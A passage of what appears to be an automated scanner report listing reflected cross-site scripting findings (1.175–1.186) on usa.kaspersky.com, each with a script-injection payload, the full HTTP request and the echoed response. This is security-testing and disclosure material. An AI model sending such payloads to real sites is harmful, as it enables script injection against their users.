<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all42cc5"-alert(1)-"19bcc8754ee/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
...[SNIP]...

1.175. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e94c"><script>alert(1)</script>8ee69f6e42a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all8e94c"><script>alert(1)</script>8ee69f6e42a/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:20:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138851"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:20:54 GMT
X-Varnish: 1163047201
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all8e94c"><script>alert(1)</script>8ee69f6e42a/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.176. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84fcc"-alert(1)-"e3f22eec311 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes84fcc"-alert(1)-"e3f22eec311/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138891"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:21:35 GMT
X-Varnish: 1163048557
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes84fcc"-alert(1)-"e3f22eec311/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_
...[SNIP]...

1.177. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ecf9"><script>alert(1)</script>35fe4c3edad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes2ecf9"><script>alert(1)</script>35fe4c3edad/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138882"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:21:24 GMT
X-Varnish: 1163048293
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes2ecf9"><script>alert(1)</script>35fe4c3edad/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.178. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acb2c"-alert(1)-"defda43c72b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes/zenacb2c"-alert(1)-"defda43c72b/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:05 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138925"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:22:08 GMT
X-Varnish: 1163049572
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes/zenacb2c"-alert(1)-"defda43c72b/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code
...[SNIP]...

1.179. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4b57"><script>alert(1)</script>1399bdc859f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/zenf4b57"><script>alert(1)</script>1399bdc859f/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138916"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:21:58 GMT
X-Varnish: 1163049277
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes/zenf4b57"><script>alert(1)</script>1399bdc859f/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.180. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55622"><script>alert(1)</script>5993aee8954 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/zen/kaspersky_usatheme55622"><script>alert(1)</script>5993aee8954/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:39 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138959"
Content-Type: text/html; charset=utf-8
Content-Length: 31429
Date: Sun, 04 Sep 2011 12:22:48 GMT
X-Varnish: 1163050653
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme55622"><script>alert(1)</script>5993aee8954/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.181. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9524"-alert(1)-"162f95c534c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes/zen/kaspersky_usathemef9524"-alert(1)-"162f95c534c/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:02 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138982"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:23:05 GMT
X-Varnish: 1163051271
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usathemef9524"-alert(1)-"162f95c534c/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)do
...[SNIP]...

1.182. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d980"><script>alert(1)</script>bb34429b864 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom8d980"><script>alert(1)</script>bb34429b864/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139033"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:24:00 GMT
X-Varnish: 1163052709
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom8d980"><script>alert(1)</script>bb34429b864/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.183. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad070"-alert(1)-"0a6f9a5e76e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes/zen/kaspersky_usatheme/customad070"-alert(1)-"0a6f9a5e76e/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:24:17 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139057"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:24:21 GMT
X-Varnish: 1163053334
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
Name = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/customad070"-alert(1)-"0a6f9a5e76e/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.
...[SNIP]...

1.184. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc898"><script>alert(1)</script>be3f789ebb4 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modulesdc898"><script>alert(1)</script>be3f789ebb4/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:25:26 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139126"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:25:40 GMT
X-Varnish: 1163055221
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modulesdc898"><script>alert(1)</script>be3f789ebb4/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.185. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 108f3"-alert(1)-"554f67a870 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules108f3"-alert(1)-"554f67a870/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:26:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139169"
Content-Type: text/html; charset=utf-8
Content-Length: 31327
Date: Sun, 04 Sep 2011 12:26:17 GMT
X-Varnish: 1163056369
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules108f3"-alert(1)-"554f67a870/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_
...[SNIP]...

1.186. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10988"-alert(1)-"4ffcedf6e1d was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock10988"-alert(1)-"4ffcedf6e1d/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:28:30 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139310"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:28:40 GMT
X-Varnish: 1163060495
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

